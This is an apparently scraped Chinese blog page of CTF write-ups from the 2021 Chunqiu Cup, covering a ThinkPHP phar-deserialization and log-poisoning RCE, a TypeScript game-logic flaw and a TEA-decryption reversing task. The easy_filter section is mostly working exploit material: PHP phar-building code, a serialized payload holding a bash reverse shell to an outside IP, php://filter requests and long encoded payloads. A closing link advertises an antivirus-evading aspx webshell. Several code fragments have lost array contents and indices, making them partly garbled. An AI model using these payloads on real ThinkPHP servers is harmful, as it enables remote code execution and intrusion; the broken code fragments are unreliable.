【wp】ctf-2021春秋杯 CTF专场

【wp】ctf-2021春秋杯

ctf-2021春秋杯easy_filter<?phpnamespace think{ abstract class Model{ protected $append = ; private $data = ; function __construct(){ $this->append = ; $this->data = ; } } class Request{ protected $hook = ; protected $filter = "system"; protected $config = ; function __construct(){ $this->filter = "system"; $this->config = ; $this->hook = ; } }}namespace thinkprocesspipes{ use thinkmodelconcernConversion; use thinkmodelPivot; class Windows{ private $files = ; public function __construct(){ $this->files=; } }}namespace thinkmodel{ use thinkModel; class Pivot extends Model{ }}namespace { use thinkprocesspipesWindows; // echo base64_encode(serialize(new Windows())); @unlink("phar.phar"); $phar = new Phar("phar.phar"); //后缀名必须为phar $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub $o = new Windows(); $phar->setMetadata($o); //将自定义的meta-data存入manifest $phar->addFromString("test.txt",...
阅读全文
2021年春秋杯春季联赛部分WriteUp CTF专场

2021年春秋杯春季联赛部分WriteUp

Webeasy_filter 跟国赛那个题很像,就是log文件的格式不大一样,改一改就好用的RCEpayload:https://www.freebuf.com/vuls/269882.html生成phar:<?php$a = unserialize(urldecode("O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Bs%3A54%3A%22bash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F47.104.134.135%2F2333+0%3E%261%27%22%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Ba%3A0%3A%7B%7D%7Ds%3A8%3A%22relation%22%3Bb%3A0%3B%7D%7D%7D"));$phar = new Phar("phar.phar"); //后缀名必须为phar$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub$phar->setMetadata($a); //将自定义的meta-data存入manifest$phar->addFromString("test.txt", "test"); //添加要压缩的文件//签名自动计算$phar->stopBuffering();对phar进行编码image-20210529150140989注意这里生成的payload每行结尾有多余的换行符和=,去除一下,然后把+编码成%2bP=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00thinkphp的日志文件在runtime/log/202105/29.log,下一步就是在本地调试下,尝试如何去掉多余的字符,只将我们的payload解码成phar文件先清空日志:index.php?s=/index/Index/hello&file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.logimage-20210529151629284为了防止多余的等号影响payload的解析,我们这样传参index.php/index/Index/hello?file=写入我们刚才生成的payloadindex.php/index/Index/hello?file=P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00image-20210529151654248生成了如下格式的日志:--------------------------------------------------------------- 127.0.0.1 GET 127.0.0.1/index.php/index/Index/hello?file=P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00 file_get_contents(P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00+=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00): failed to open stream: File name too long经过尝试,将payload修改成如下格式即可正常解码:payload开头加入俩数字来使得前面的=正常解码,结尾加上a使得最终只出现一个payload50P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00P=00n=00U=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00C=00X=00V=00Z=00K=00W=00D=00l=00R=00w=00s=00R=00A=00g=003=00p=001=001=008=00O=00N=00k=002=00U=00P=00O=00w=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00a再清空,发送payloadimage-20210529151459137image-20210529152400240解码index.php?s=/index/Index/hello&file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.logimage-20210529152434435触发image-20210529152509697成功执行,接下来就把命令改成tac /flag就好了http://eci-2zegz186wmvgj36lmnge.cloudeci1.ichunqiu.com/index.php/index/Index/hello?file=50P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00j=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00t=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00O=00T=00o=00i=00d=00G=00F=00j=00I=00C=009=00m=00b=00G=00F=00n=00I=00j=00t=009=00c=00z=00o=00y=00M=00T=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00H=00d=00p=00d=00G=00h=00B=00d=00H=00R=00y=00I=00j=00t=00h=00O=00j=00E=006=00e=003=00M=006=00N=00j=00o=00i=00N=00H=00V=000=00M=00T=00V=00t=00I=00j=00t=00z=00O=00j=00Y=006=00I=00n=00N=005=00c=003=00R=00l=00b=00S=00I=007=00f=00X=00M=006=00O=00T=00o=00i=00A=00C=00o=00A=00Y=00X=00B=00w=00Z=00W=005=00k=00I=00j=00t=00h=00O=00j=00E=006=00e=003=00M=006=00N=00j=00o=00i=00N=00H=00V=000=00M=00T=00V=00t=00I=00j=00t=00h=00O=00j=00A=006=00e=003=001=009=00c=00z=00o=004=00O=00i=00J=00y=00Z=00W=00x=00h=00d=00G=00l=00v=00b=00i=00I=007=00Y=00j=00o=00w=00O=003=001=009=00f=00Q=00g=00A=00A=00A=00B=000=00Z=00X=00N=000=00L=00n=00R=004=00d=00A=00Q=00A=00A=00A=00B=009=007=00L=00F=00g=00B=00A=00A=00A=00A=00A=00x=00%2b=00f=009=00i=002=00A=00Q=00A=00A=00A=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00p=006=00T=00n=00c=00B=00R=00c=007=00o=00Z=00V=00i=00m=00m=005=00n=00c=00l=00W=00t=00J=00y=00W=00w=007=00Q=00I=00A=00A=00A=00B=00H=00Q=00k=001=00C=00aimage-20210529153357667也可以弹shellimage-20210529175348399ctftaker /source有源码import { createHash } from "crypto";import { readFileSync } from "fs";import { resolve } from "path";import {exit} from "process";import cookieSession  from "cookie-session";import express from "express";import { SessionData } from "express-session";import * as CONST from "./const";declare module "express-session" {  interface SessionData {    history: string;    monster: SerializedObj;    player: SerializedObj;    coin: number;    init: boolean;  }}interface SerializedObj {  ATK: number;  DEF: number;  HP: number;  factor: number;  name: string;}class Obj {  ATK: number;  DEF: number;  HP: number;  factor: number;  constructor(readonly name: string, factor: number|string, ATK?: number, DEF?: number, HP?: number) {    this.factor = factor = parseInt(`${factor}`);    this.ATK = ATK ?? factor * Math.random();    this.DEF = DEF ?? factor * Math.random();    this.HP = HP ?? factor * Math.random();  }  levepup(factor: number|string) {    this.factor = factor = this.factor + parseInt(`${factor}`);    this.ATK = factor * Math.random();    this.DEF = factor * Math.random();    this.HP = factor * Math.random();  }  fight(obj: Obj):  {    const his: string = ;    let selfHp = this.HP;    let objHp = obj.HP;    his.push(`${this.name} HP:${selfHp};${obj.name} HP:${objHp}`);    while(true) {      objHp -= this.ATK - obj.DEF;      objHp = Math.max(objHp, 0);      his.push(`${this.name}向${obj.name}发起攻击!`);      his.push(`${this.name} HP:${selfHp};${obj.name} HP:${objHp}`);      if(objHp === 0) break;      selfHp -= obj.ATK - this.DEF;      selfHp = Math.max(selfHp, 0);      his.push(`${obj.name}向${this.name}发起攻击!`);      his.push(`${this.name} HP:${selfHp};${obj.name} HP:${objHp}`);      if(selfHp === 0) break;    }    return ;  }  static serialize(obj: Obj): SerializedObj {    return {      ATK: obj.ATK,      DEF: obj.DEF,      HP: obj.HP,      factor: obj.factor,      name: obj.name,    };  }  static deserialzie(obj: SerializedObj): Obj {    return new Obj(obj.name, obj.factor, obj.ATK, obj.DEF, obj.HP);  }}const app = express();app.use(express.static(resolve("static")));app.use(express.json());app.use(express.urlencoded({extended: true}));const secret = createHash("md5").update(`${Math.random()}`).digest("hex");app.use(cookieSession({  secret: secret,  name: "session",}));console.log(secret);function initSession(session: any): session is SessionData {  if(!session.init) {    session.history = ;    session.player = new Obj("Player", 0);    session.coin = 1;    session.init = true;    session.monster = ;  }  return true;}app.use((req, res, next) => {  initSession(req.session);  next();});app.get("/his", (req, res) => {  if(!initSession(req.session)) return;  res.send({    message: req.session.history.join("n"),  });});app.get("/start", (req, res) => {  if(!initSession(req.session)) return;  req.session.history = req.session.history.concat(CONST.banner);  res.send({    message: CONST.banner.join("n"),  });});app.post("/levelup", (req, res) => {  if(!initSession(req.session)) return;  const {f} = req.body;  if(!f || f > req.session.coin) {    return res.send({message: "不大对呢"});  }  req.session.coin -= f;  const player = Obj.deserialzie(req.session.player);  if(player.factor > 50) {    return res.send({message: "你太强了,寻找更多的机遇吧"});  }  player.levepup(f);  req.session.player = Obj.serialize(player);  const msg = `${player.name}使用了${f}枚硬币升级了自己  现在的状态:ATK:${player.ATK},DEF:${player.DEF},HP:${player.HP},COIN:${req.session.coin}枚,还剩${req.session.monster.length}个题`.split("n");  req.session.history = req.session.history.concat(msg);  res.send({message: msg.join("n")});});app.get("/monster", (req, res) => {  if(!initSession(req.session)) return;  if(req.session.monster.length===0) {    return res.send({message: CONST.footer.join("n")});  }  const monster = Obj.deserialzie(req.session.monster);  res.send({    message: `${monster.name}出现了!ATK:${monster.ATK},DEF:${monster.DEF},HP:${monster.HP}`,  });});app.get("/status", (req, res) => {  if(!initSession(req.session)) return;  const player = Obj.deserialzie(req.session.player);  res.send({message: `${player.name}现在的状态:ATK:${player.ATK},DEF:${player.DEF},HP:${player.HP},COIN:${req.session.coin}枚,还剩${req.session.monster.length}个题`});});app.get("/fight", (req, res) => {  if(!initSession(req.session)) return;  if(req.session.monster.length===0) {    return res.send({message: CONST.footer.join("n")});  }  const player = Obj.deserialzie(req.session.player);  const monster = Obj.deserialzie(req.session.monster);  const  = player.fight(monster);  if(win) {    req.session.monster = req.session.monster.slice(1);    his.push("你赢了耶!");  } else {    his.push("你输了,刷新以重新开始");    req.session.init = false;  }  req.session.history = req.session.history.concat(his);  res.send({message: his.join("n")});});app.get("/source", (req, res) => {  res.send(readFileSync("./src/main.ts"));});app.get("/exit", (req, res) => {  exit(0);});app.use((err: any, req: any, res: any) => {  console.error(err.stack);  res.status(500).send("Something broke!");});app.listen(80);重要的地方在这里image-20210529161549436image-20210529161603354传入9999999/0,即可把自己的倍数增加到9999999,然后序列化保存image-20210529161816131下次反序列化player的时候,player的属性就会超级加倍image-20210529161823449一开始是个弱鸡image-20210529161921628属性加倍image-20210529161943872打出flagimage-20210529162001119Reversebackdoor 首先程序会net listen监听端口image-20210529171048979输入g01angBackd00r会执行 mai n_Decrypt函数image-20210529171102262image-20210529171135816chal 直接打开文件image-20210529171318392根据敏感变量名猜测是tea家族算法提取出数据33208527578,4235851793.0699878777,16770980233.41664154466,34643198083.83532878313,29223160963.122276156225,339876773.163775107838,3138262082key 3735928559,3405691582,269488144,16843009exp#include <stdio.h>#include <stdint.h> //加密函数void encrypt (uint32_t* v, uint32_t* k) {    uint32_t v0=v, v1=v, sum=0, i;           /* set up */    uint32_t delta=0x9e3779b9;                     /* a key schedule constant */    uint32_t k0=k, k1=k, k2=k, k3=k;   /* cache key */    for (i=0; i < 32; i++) {                       /* basic cycle start */        sum += delta;        v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);        v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);    }                                              /* end cycle */    v=v0; v=v1;}//解密函数void decrypt (uint32_t* v, uint32_t* k) {    uint32_t v0=v, v1=v, sum=0xC6EF3720, i;  /* set up */    uint32_t delta=0x9e3779b9;                     /* a key schedule constant */    uint32_t k0=k, k1=k, k2=k, k3=k;   /* cache key */    for (i=0; i<32; i++) {                         /* basic cycle start */        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);        sum -= delta;    }                                              /* end cycle */    v=v0; v=v1;} int main(){    uint32_t v={3775107838,3138262082},k={3735928559,3405691582,269488144,16843009};    // v为要加密的数据是两个32位无符号整数    // k为加密解密密钥,为4个32位无符号整数,即密钥长度为128位    decrypt(v, k);    printf(",%u,%un",v,v);    return 0;}image-20210529171403840 本文始发于微信公众号(山警网络空间安全与电子数据取证):2021年春秋杯春季联赛部分WriteUp
阅读全文
如何自己写aspx过狗D盾一句话木马 moonsec_com

如何自己写aspx过狗D盾一句话木马

